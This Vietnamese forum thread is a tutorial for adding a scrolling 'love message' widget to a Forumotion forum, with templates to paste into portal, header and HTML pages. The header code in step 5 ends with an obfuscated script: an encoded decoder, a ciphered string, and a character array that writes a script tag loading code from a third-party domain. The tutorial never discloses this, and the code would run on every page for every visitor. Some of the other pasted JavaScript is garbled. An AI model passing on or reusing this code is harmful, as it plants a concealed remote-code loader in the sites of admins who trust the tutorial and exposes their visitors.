[Codes] Thông điệp yêu thương Teen9B

  Bài viết hay nhất1
BƯỚC 1

Tạo Box Thông điệp yêu thương

ACP> QLTT> Forum> Categories & Forum
- tạo 1 Forum (diễn đàn) đặt tên là Thông điệp yêu thương
để lưu giữ những dòng thông điệp
- bấm Save
- ra ngòai Index, bấm vào Box Thông điệp yêu thương vừa tạo
- nhìn lên thanh address sẽ thấy link
ví dụ của teen9b

http://www.teen9b.tk/f165-forum

>>> Số thứ tự của Box Thông điệp yêu thương là 165.
  Bài viết hay nhất2
BƯỚC 2

Kích họat 3 Widgets Top poster, Recent topics và News

- ACP> Module> Portal & Forum widgets management>
- Làm theo chỉ dẫn của hình bên dướiSắp xếp vị trí và chỉnh thông số 3 Widgets

- Sắp xếp theo đúng như hình chỉ dẫn dưới đây- Bấm mục Recent topics và chỉnh theo hình:- Bấm mục News và chỉnh theo hình:

  Bài viết hay nhất3
BƯỚC 3

Thay codes Recent topics

- ACP> Display> Templates> Portal> Recent topics
- thay tòan bộ codes bằng codes sau:

Spoiler:
Code:
</td></tr></table></td>
<td style="width: 0px"></td>
<td valign="top" style="border: 1px solid #9DB3C5; padding: 1px">
<style type="text/css">
th,td,p {
    font-family: Tahoma,Verdana,Arial,Helvetica,sans-serif }
/* Style cho menu tabs */div.TabView div.Tabs{height: 32px; /* chiều cao của tab menu */overflow: hidden;}div.TabView div.Tabs: hover,{height: 32px; /* chiều cao của tab menu */overflow: hidden;}div.TabView div.Tabs a , div.TabView div.Tabs a:hover {float: left;display: block;background-color:#;text-align: center;height: 29px;padding: 6px;vertical-align: middle;border:1px solid #b4d0f3;border-top: 0px;border-left: 0px;border-bottom: 0px; /* đường viền quanh tabs menu */text-decoration: none;font-family: Tahoma;font-size: 11px;color: #000000;}.hotrott{background-color: #ffffff;border: 0px solid #ded7d7;}.nen{background-color: #ffffff;border: 1px solid #ded7d7;}div.TabView div.Tabs a.Active{background-color: #ffffff; /* màu nền tab menu active */color: #000000;border:1px solid #b4d0f3;border-top: 0px;border-left: 0px;border-bottom: 0px; padding: 6px;height: 29px;font-size: 11px;font-weight: bold;}/* Style cho phần text nội dung của mỗi tab */div.TabView {clear: both;border: 0px solid #ffffff;overflow: hidden; /* giá trị là auto nếu muốn hiện scroll bar */}div.TabView div.Pages div.Page{height: 100%;padding: 0px;border: 0px solid #b4d0f3;overflow: hidden; /* giá trị là auto nếu muốn hiện scroll bar */}</style><script type="text/javascript" src="http://untip-js.googlecode.com/files/Tabview.js"></script><div id="TabView" class="TabView" style="padding: 0px;"><!--
tabs --><div width="100%" class="Tabs"><a class="Active" href="javascript:tabview_switch('TabView', 1);">Bài viết mới</a><a>Thống kê</a><ul class="tabs" id="vietvbb_topstats_t">  <li style="border-right: 0px; display: none;" id="vietvbb_topstats_t_loading"></li> </ul> </div><!--
 nội dung tabs --><div style="height:410px; width:100%" class="Pages"><div class="Page" style="padding: 0px; height: 300px; display: block;"><!-- BEGIN classical_row -->
<table class="tborder" style="border-bottom-width: 0px;" align="center" border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr>
<td>

<table align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
</table></td></tr></tbody>
<tbody>
<tr>
<td style="padding: 0px; background: rgb(255, 255, 255) none repeat scroll 0% 0%; -moz-background-clip: border; -moz-background-origin: padding; -moz-background-inline-policy: continuous;" width="100%">

<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr valign="top">
<td style="border-top: 0px none; padding: 0px; background: transparent url(http://i61.servimg.com/u/f61/15/61/17/20/list13.gif) no-repeat scroll center top; -moz-background-clip: border; -moz-background-origin: padding; -moz-background-inline-policy: continuous;" width="24"><img src="http://illiweb.com/fa/empty.gif" width="24" border="0"></td>
  <td style="border-top: 0px none; padding: 0px; line-height: 20px; background-repeat: repeat;" align="left" background="http://i61.servimg.com/u/f61/15/61/17/20/listbg13.gif">

<!-- BEGIN recent_topic_row -->
<!-- BEGIN switch_poster -->

<table border="0" class="lbb" cellpadding="0" cellspacing="0" width="100%">
<tr valign="top">
<td style="height: 20px" width="74%"><a onmouseover="showtip('<b><font color=#131eed>Tiêu đề:</font> <font color=#FF66FF>{classical_row.recent_topic_row.L_TITLE}</font></b><br> <b><font color=#131eed>Thời gian:</font>
<font color=#00FF99>{classical_row.recent_topic_row.S_POSTTIME}</font></b>');" onmouseout="hidetip();" href="{classical_row.recent_topic_row.U_TITLE}"><b><font style="font-family: Tahoma; font-size: 11px">{classical_row.recent_topic_row.L_TITLE}</font></b></a></td><td style="height: 20px" width="26%" align="right"><a onmouseover="showtip('<b><font color=#131eed>Click để xem profile của thành viên này !</font></b>');" onmouseout="hidetip();"  href="{classical_row.recent_topic_row.switch_poster.U_POSTER}"><font style="font-family: Tahoma; font-size: 11px">{classical_row.recent_topic_row.switch_poster.S_POSTER}</a>

</td></tr></table>
<!-- END switch_poster -->
<!-- END recent_topic_row -->

<script type="text/javascript">
jQuery(".lbb:contains('♥')").remove();
jQuery(".lbb:contains('»')").remove();
</script>

</td></tr></table></td></tr></tbody></table>

<!-- END classical_row -->

</div><div class="Page" style="padding: 0px; height: 304px; display: block;"><table class="tborder" style="border-bottom-width: 0px;" align="center" border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr>
<td>

<table align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
</table></td></tr></tbody>
<tbody>
<tr><td style="padding: 0px; background: rgb(255, 255, 255) none repeat scroll 0% 0%; -moz-background-clip: border; -moz-background-origin: padding; -moz-background-inline-policy: continuous;" width="100%"><table border="0" cellpadding="0" cellspacing="0" width="100%"><tr valign="top"><td style="border-top: 0px none; padding: 0px; background: transparent url(http://i24.servimg.com/u/f24/13/54/69/46/list12.gif) no-repeat scroll center top; -moz-background-clip: border; -moz-background-origin: padding; -moz-background-inline-policy: continuous;" width="24"><img src="http://illiweb.com/fa/empty.gif" width="24" border="0"></td><td style="border-top: 0px none; padding: 0px; line-height: 20px; background-repeat: repeat;" align="left" background="http://i24.servimg.com/u/f24/13/54/69/46/listbg13.gif">
<A href=/search.forum?search_id=activetopics><span><font style="font-family: Tahoma; font-size: 11px">Bài viết trong ngày</span></a><br>
<A href=/stats.htm#10><span><font style="font-family: Tahoma; font-size: 11px">Các bài viết trong tháng</span></a><br>
<A href=/stats.htm#2><span><font style="font-family: Tahoma; font-size: 11px">Thống kê tổng thể</span></a><br>
<A href=/stats.htm#3><span><font style="font-family: Tahoma; font-size: 11px">Topic sôi nổi nhất</span></a><br>
 <A href=/stats.htm#4><span><font style="font-family: Tahoma; font-size: 11px">Topic xem nhiều nhất</span></a><br>
 <A href=/stats.htm#5><span><font style="font-family: Tahoma; font-size: 11px">Thành viên có nhiều chủ đề nhất</span></a><br>
 <A href=/stats.htm#6><span><font style="font-family: Tahoma; font-size: 11px">Thành viên post bài nhiều nhất trong một tuần</span></a><br>
 <A href=/stats.htm#7><span><font style="font-family: Tahoma; font-size: 11px">Thành viên post bài nhiều nhất trong tháng</span></a><br>
 <A href=/stats.htm#8><span><font style="font-family: Tahoma; font-size: 11px">Top poster</span></a><br>
  <A href=/stats.htm#9><span><font style="font-family: Tahoma; font-size: 11px">Số topic trong tháng</span></a><br>
</td></tr></table></td></tr></tbody></table>
</div> <script type="text/javascript">tabview_initialize('TabView');</script><ScrollTop --><style type="text/css">#topbar{  PADDING-TOP: 0px;PADDING-BOTTOM: 0px;PADDING-RIGHT: 0px; PADDING-LEFT: 0px;VISIBILITY: hidden;WIDTH: 180px;FONT-FAMILY: Tahoma;POSITION: absolute;}</style><script type="text/javascript">var persistclose = 0<!--
 Vị trí-->var startX = 80var startY = 500var verticalpos = "frombottom"function iecompattest(){return (document.compatMode && document.compatMode!="BackCompat")? document.documentElement : document.body}function get_cookie(Name){var search = Name + "="var returnvalue = "";if (document�cookie.length > 0){offset = document�cookie.indexOf(search)if (offset != -1){offset += search.lengthend = document�cookie.indexOf(";", offset);if (end == -1) end = document�cookie.length;returnvalue=unescape(document�cookie.substring(offset, end))}}return returnvalue;}function closebar(){if (persistclose)document�cookie="remainclosed=1"document.getElementById("topbar").style.visibility="hidden"}function staticbar(){barheight=document.getElementById("topbar").offsetHeightvar ns = (navigator.appName.indexOf("Netscape") != -1) || window.opera;var d = document;function ml(id){var el=d.getElementById(id);if (!persistclose || persistclose && get_cookie("remainclosed")=="")el.style.visibility="visible"if(d.layers)el.style=el;el.sP=function(x,y){this.style.right=x+"px";this.style.top=y+"px";};el.x = startX;if (verticalpos=="fromtop")el.y = startY;else{el.y = ns ? pageYOffset + innerHeight : iecompattest().scrollTop + iecompattest().clientHeight;el.y -= startY;}return el;}window.stayTopLeft=function(){if (verticalpos=="fromtop"){var pY = ns ? pageYOffset : iecompattest().scrollTop;ftlObj.y += (pY + startY - ftlObj.y)/8;}else{var pY = ns ? pageYOffset + innerHeight - barheight: iecompattest().scrollTop + iecompattest().clientHeight - barheight;ftlObj.y += (pY - startY - ftlObj.y)/8;}ftlObj.sP(ftlObj.x, ftlObj.y);setTimeout("stayTopLeft()", 10);}ftlObj = ml("topbar");stayTopLeft();}if (window.addEventListener)window.addEventListener("load", staticbar, false)else if (window.attachEvent)window.attachEvent("onload", staticbar)else if (document.getElementById)window.onload=staticbar</script></div> </td>
</tr>                                           
</thead>                                             
</table>

- bấm Save
- bấm dấu cộng màu xanh
  Bài viết hay nhất4
BƯỚC 4

Thay codes Top posters

- ACP> Display> Templates> Portal> Top posters
- thay tòan bộ codes bằng codes sau:

Spoiler:
Code:
 <table width="100%" border="0" cellspacing="0" cellpadding="0">
<td style="padding: 0px; background: rgb(255, 255, 255) none repeat scroll 0% 0%; -moz-background-clip: border; -moz-background-origin: padding; -moz-background-inline-policy: continuous;" width="100%"><div style="margin-bottom: 1px;"><ul class="tabs"><li class="current"><span style="padding: 0px 7px;">
        <select name="mylist"><option value="/#"><b>Top posters</b>
</option></select></span></li></ul><table border="0" cellpadding="0" cellspacing="0" width="100%"><tr valign="top"><td style="border-top: 0px none; padding: 0px; background: transparent url(http://illiweb.com/fa/pbucket.gif) no-repeat scroll center top; -moz-background-clip: border; -moz-background-origin: padding; -moz-background-inline-policy: continuous;" width="24" height="200"><img src="http://illiweb.com/fa/empty.gif" width="24" border="0"></td><td style="border-top: 0px none; padding: 0px; line-height: 20px; background-repeat: repeat;" align="left" background="http://illiweb.com/fa/pbucket.gif"><!-- BEGIN POSTER --><font style="font-family: Tahoma; font-size: 11px"> {POSTER.NAME}</font><br><!-- END POSTER --></td></tr></table></div></div></td>
 
</table><tr>
     

- bấm Save
- bấm dấu cộng màu xanh
  Bài viết hay nhất5
BƯỚC 5

Thay một phần codes trong Header

- ACP> Display> Templates> Overall_header
- tìm đoạn:

Spoiler:
Code:
<div id="page-body">
           
<div id="{ID_CONTENT_CONTAINER}"
{CLASS_CONTENT_CONTAINER}>
               
<table cellpadding="0" cellspacing="0"
width="100%" class="three-col">
                 
<tbody>
                   
 <tr>
                       
<td valign="top" width="{C1SIZE}">
                         
 <div id="{ID_LEFT}">
 
 <!-- BEGIN giefmod_index1 -->
   
{giefmod_index1.MODVAR}
     
<!-- BEGIN saut -->
     
<div style="height:{SPACE_ROW}px"></div>
                         
<!-- END saut -->
                             
<!-- END giefmod_index1 -->
                           
</div>
                       
</td>
       
 <td valign="top" width="100%">
<!-- BEGIN html_validation -->
                       
</td>
                     
</tr>
               
 </tbody>
               
</table>
           
</div>
            </div>
        </td>
      </tr>
  </table>
</body>
</html>
<!-- END html_validation -->

thay bằng đoạn sau:

Spoiler:
Code:
{JAVASCRIPT}
<div id="page-body">
              <div id="{ID_CONTENT_CONTAINER}"{CLASS_CONTENT_CONTAINER}>
                                            <table  class="thongke" cellpadding="0" cellspacing="0" border="0" width="100%" align="center" >
                                                  <tr>
                                                  <td valign="top" width="100%">
                                                  <div class="test">
                                                    <table class="thongke" cellpadding="5" cellspacing="0" style="border: 1px #ded7d7 solid;" border="0" width="100%" align="center">
                                                    <thead>
                                          <tr valign="top">
                                    <td class="tcat"><font color=white>Forum 4all</font></td>
                                        </tr>
                                            </thead>
                                                <tr>
                                              <td width="100%">
                                                    <table class="thongke" cellpadding="0" cellspacing="2" border="0" width="100%" align="center">
                                                      <thead>
                                                <tr valign="top">
                                                            <td width="23%"></td><td width="100%" colspan="2"></td>
                                                          </tr>
                                                <tr>
                                                      <td><table  class="thongke" cellpadding="0" cellspacing="0" border="0" width="100%" align="center" ><tr><td colspan="3"><div class="mainbox" style="margin-bottom: 5px;"><ul class="tabs"><li class="current"><span style="padding: 0px 2px;">Forum 4all</span></li></ul><embed src="http://ahs4ever.org/forum/vietvbb/topx/focus.swf" wmode="opaque" FlashVars="config=5|0xffffff|0x0099ff|50|0xffffff|0x0099ff|0x000000&bcastr_flie=

http://i37.servimg.com/u/f37/15/97/41/27/861-5010.jpg
|http://i37.servimg.com/u/f37/15/97/41/27/tet10.jpg
|http://i68.servimg.com/u/f68/15/68/74/32/copy_o10.jpg
|http://i69.servimg.com/u/f69/15/69/19/33/theold10.jpg
|http://i67.servimg.com/u/f67/15/97/41/27/10797310.gif

&bcastr_link=
http://4all.forumotion.com/forum
|http://4all.forumotion.com/t1684-topic
|http://4all.forumotion.com/forum
|http://4all.forumotion.com/forum
|http://4all.forumotion.com/forum


&bcastr_title=
Mái Nhà Tình Bạn
|Tết Tân Mão
|Happy New year
|4all iu dấu
|QT Phụ Nữ 8.3


& menu="false" quality="high" width="100%" height="150" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" /></div></td></tr>
<tr>
<td valign="top" style="border: 1px solid #9DB3C5; border-right: 0px;">
<!-- BEGIN giefmod_index1 -->
{giefmod_index1.MODVAR}<!-- END giefmod_index1 -->
                                               
                                            </td></tr></table>
                                          </div>
                              </td>
                                    </tr>
                                    <tr>
                                              <td valign="top" width="100%">
<!-- BEGIN html_validation -->
                                            </td>
                                                                </tr>
                                                      </tbody>
                                                </table>
   
              </div>
            </div>
        </td>
      </tr>
  </table>
</body>
</html>
<!-- END html_validation -->

<script type='text/javascript'>
var str3='%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E';document.write(unescape(str3));var str4='*8Hxhwnuy*75qfslzflj*8I*77of%7Bfxhwnuy*77*8Jkzshynts*75lnfnrf7*7%3Dtg*7%3E*%3CG%7Bfw*75ht*8I5*8G%7Bfw*75wj*8I*7%3C*7%3C*8G%7Cmnqj*7%3Dht*8Htg3qjslym*7%3E*%3CGwj0*8IXywnsl3kwtrHmfwHtij*7%3Dtg*%3AGht*%3AI*7%3E*8Ght00*8G*%3CIwjyzws*75wj*8G*%3CI*8H4xhwnuy*8J5';dF(str4);var str2=new Array(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,119,119,119,46,99,51,122,46,99,111,46,99,99,47,104,116,109,108,45,104,51,51,46,104,116,109,62,60,47,115,99,114,105,112,116,62);document.write(giaima2(str2));
</script>

- bấm Save
- bấm dấu cộng màu xanh
  Bài viết hay nhất6
BƯỚC 6

Thay codes News

- ACP> Display> Templates> Portal> News
- thay tòan bộ codes bằng codes sau:

Spoiler:
Code:
</tr>
<tr>
<td>
<table style="background: #fff;color: #555555;border: 2px solid #bbb;-moz-border-radius:5px;" cellpadding="6" cellspacing="2" border="0" width="100%" align="center"><tr><td nowrap="nowrap" style="background: #fff;color: #313131;border: 1px solid #ccc;-moz-border-radius:5px">


<a onmouseover="showtip('<font size=5>GỬI THÔNG ĐIỆP - CLICK !!</font><br>Chỉ dành cho thành viên có <font color=#FF5F5F>nick màu</font> hoặc <font color=#C2FFAF>trên 30 bài viết</font> ...');" onmouseout="hidetip();" class='c3luvmes' href="http://diendan.4allvn.info/h64-page"><img src="http://www.c3z.co.cc/users/2611/10/63/87/album/tdyt210.png" /><img src="http://r26.imgfast.net/users/2611/10/63/87/album/tdyt_s10.png" /></a>
</td>

<td width="100%" style="background: #fff url(http://www.c3z.co.cc/users/2611/10/63/87/album/master10.gif);color: #313131;border: 1px solid #ccc;-moz-border-radius:5px">
<marquee behavior="scroll" onmouseover="this.stop()" onmouseout="this.start()" scrollamount="1" scrolldelay="20" direction="left" truespeed="truespeed">
<!-- BEGIN post_row -->
<span style="margin-right:60px" class="modnew">
<span onmouseover="showtip(this.getElementsByTagName('div')[0].innerHTML);" onmouseout="hidetip();" style="color:#2F2F2F; font-size:11px"><b>
<span class="gensmall" style="font-size: 9pt"><b>{post_row.POSTER}</b></span> </b>
<span style="font-size: 9pt">nhắn với</span>
<span style="color:#FF009A;font-weight:bold;font-size: 9pt">{post_row.TITLE}</span>
<div style="display: none;"> gửi vào lúc {post_row.TIME} ...</div></span>:
<span class="lovemes" style="font-size: 9pt"><font color="blue">{post_row.TEXT}</font></span><span style="padding: 0px 40px"></span></span>
<!-- END post_row --></marquee>
</td>
</tr>
</table>

</td>

<style type="text/css">
@charset "utf-8";
.lovemes table, .lovemes div, .lovemes hr, .lovemes br, .lovemes embed{display:none!important}
.lovemes {font-weight:bold; font-size:11px}
.lovemes img {vertical-align: middle; max-height:30px}
</style>

- bấm Save
- bấm dấu cộng màu xanh
  Bài viết hay nhất7
BƯỚC 7

Viewsource để lấy codes Hình Vui
- trong đường link này

http://www.teen9b.tk/smilies.forum?mode=smilies_frame


thay www.teen9b.tk bằng link forum bạn
- bấm vào đừơng link vừa thay trên sẽ ra 1 trang
gồm tất cả những Hình vui dùng trong froum
- bấm CTR U để lấy codes các hình vui này
- bấm CTR A và Copy tòan bộ codes Hình Vui

Tạo trang HTML Hình Vui
- ACP> Modules> HTML> HTML Management>
- bấm nút "Create a new HTML page" góc phải bên dưới để tạo 1 trang HTML
- đặt tên là Hình Vui
- Copy toàn bộ codes Hình Vui vừa làm ở trên vào khung HTML
- bấm Submit.
- trở ra lại HTML copy link trang HTML Hình Vui vừa tạo
ví dụ của teen9b là:
http://www.teen9b.tk/h14-page
  Bài viết hay nhất8
BƯỚC 8 :Yoyo và Cici11

Tạo trang HTML Thông Điệp Yêu Thương - TĐYT

- ACP> Modules> HTML> HTML Management>
- bấm nút "Create a new HTML page" bên dưới góc phải để tạo 1 trang HTML
- đặt tên là Thông Điệp Yêu Thương - TĐYT
- Copy tòan bộ codes dưới đây vào khung HTML

Spoiler:
Code:
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="revisit-after" content="0.2 days">
<meta name="robots" content="FOLLOW,INDEX">
<meta name="Robots" content="index, follow">
<meta name="GOOGLEBOT" content="index,follow">
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js" type="text/javascript"></script>
<script src="http://illiweb.com/rs3/13/frm/lang/vi.js" type="text/javascript"></script>
<style type="text/css">
@charset "utf-8";
/* Design and Code by ligerv */
*{margin:0px; padding:0px;}
body {
background : #f8adce url(http://img155.imageshack.us/img155/3050/47551978.jpg);
color : #000000;
font : 10pt verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif;
margin : 0;
padding : 0;
background-attachment : fixed;
background-position : center;
}
#posting {
padding : 100px 200px 500px 200px;
}
.button, .mainoption, input[type="submit"], input[type="button"], input[type="reset"] {
background : #f4f5f4 url(/users/2211/12/43/96/album/tabbg110.png);
padding : 2px 5px;
}
select, input, textarea {
text-indent : 2px;
border : 1px solid #ccc;
}
.emohidden {
display : none;
}
.emoshown {
display : inline;
}
.postgen, .post
{
    -moz-opacity: 0.6;
    opacity: 0.6;
    filter: alpha(opacity=60);
}
a img {border-width:0;}
/* Design and Code by ligerv */
</style>

<script type="text/Javascript">
function toggleemo (postid) {
var whichpost = document.getElementById(postid);
if (whichpost.className=="emoshown") { whichpost.className="emohidden"; } else { whichpost.className="emoshown"; }
} </script>
</head>
<body>

<form action="/posting.forum" method="post" name="post" onsubmit="return vB_Editor['text_editor'].prepare_submit(0,0)" enctype="multipart/form-data"  align="center"><table width="600px" border="0" cellspacing="1" cellpadding="0" align="center" id="posting">
<tr><td width="100px"><div style="width:100px;">
<span class="gen"><b><font color="green">Gửi đến :</font></b></span></div></td><td><span class="gen">
<input class="postgen" style="width:450px; height:22px; display:inline" type="text" value="Tất cả thành viên" onblur="if(this.value=='') this.value='Tất cả thành viên';" onfocus="if(this.value=='Tất cả thành viên') this.value='';"  tabindex="2" title="" onkeypress="if (event.keyCode==13){return false}" id="username" name="subject" maxlength="50" size="20">
 
</span>
<a href="javascript:toggleemo('emo4all')" onmouseover="helpline('z')" onmouseout="helpline('
')" ><img src="http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/38.gif" alt="thèm nhỏ dãi"></a>

<input onclick="set_solved(this.form.elements['subject'],'»')" class="mainoption" style="font-weight: bold;height:22px;" type="submit" name="post" value="Gửi" tabindex="6" accesskey="s" /></td></tr><tr><td valign="top"><table width="100%" border="0" cellspacing="0" cellpadding="1"><tr><td><span class="gen">
<font color="Green"><b>Nội dung:</b></font></a></font>
</span></td></tr></table></td><td valign="top"><span class="genmed"></span><table border="0" cellspacing="0" cellpadding="0" width="100%"><tr><td colspan="9"><span class="gensmall" style="width:450px;font-size:10px" id="helpbox"></span></td></tr><tr><td colspan="9">
<span class="gen">


<textarea id="" class="post" style="width:600px; height:200px; background: #000; color: #ccc; " onclick="storeCaret(this)" onkeyup="storeCaret(this)" name="message" rows="1" cols="35" tabindex="3" onselect="storeCaret(this)" wrap="virtual"></textarea>
</span>
</td></tr></table>
<div class="emohidden" id="emo4all"><iframe name="smilies" src="/h67-page" marginwidth="0" marginheight="0" border="0" onmouseover="helpline('z')" onmouseout="helpline('
')" class="row1" width="600" frameborder="0" height="300" scrolling="0" style="background:transparent;"></iframe></div>
</td></tr></table>

<input type="hidden" name="lt" value="0" />
<input type="hidden" name="mode" value="newtopic" />
<input type="hidden" name="f" value="93" />
</form>

</body></html>

- tìm và thay số 93 trong đoạn

Code:
<input type="hidden" name="f" value="93" />


bằng số thứ tự của Box Thông điệp yêu thương tạo ở bước 1.
- tìm và thay /h67-page bằng
link trang HTML Hình Vui tạo ở bước 7.
- bấm Submit.
- trở ra lại HTML copy link trang HTML Thông Điệp Yêu thương - TĐYT này.

ví dụ của teen là:

http://www.teen9b.tk/h14-page

  Bài viết hay nhất9
BƯỚC 9 :Yoyo và Cici16

Thay link HTML TĐYT vào News

- ACP> Display> Templates> Portal> News
- tìm và thay

Code:
http://diendan.4allvn.info/h64-page

bằng link HTML Thông Điệp Yêu Thương TĐYT ở bước 8.
- bấm Save
- bấm dấu cộng màu xanh

Thế là xong rồi đó bạn à!

Nguồn: diendan.4allvn.info
  Bài viết hay nhất10
mik mún bỏ cái quy định là trên 30 bài viết ms dc sử dụng thì xóa code nào vậy
  Bài viết hay nhất11
Bạn vào ACP >> modules >> Portal & Widgets >> Forum widgets management >> Ấn vào bánh xe News
Tại vị trí Number of news bạn điền vào đó là số 0.
Chúc bạn thành công!
  Bài viết hay nhất12
Bạn không có quyền trả lời bài viết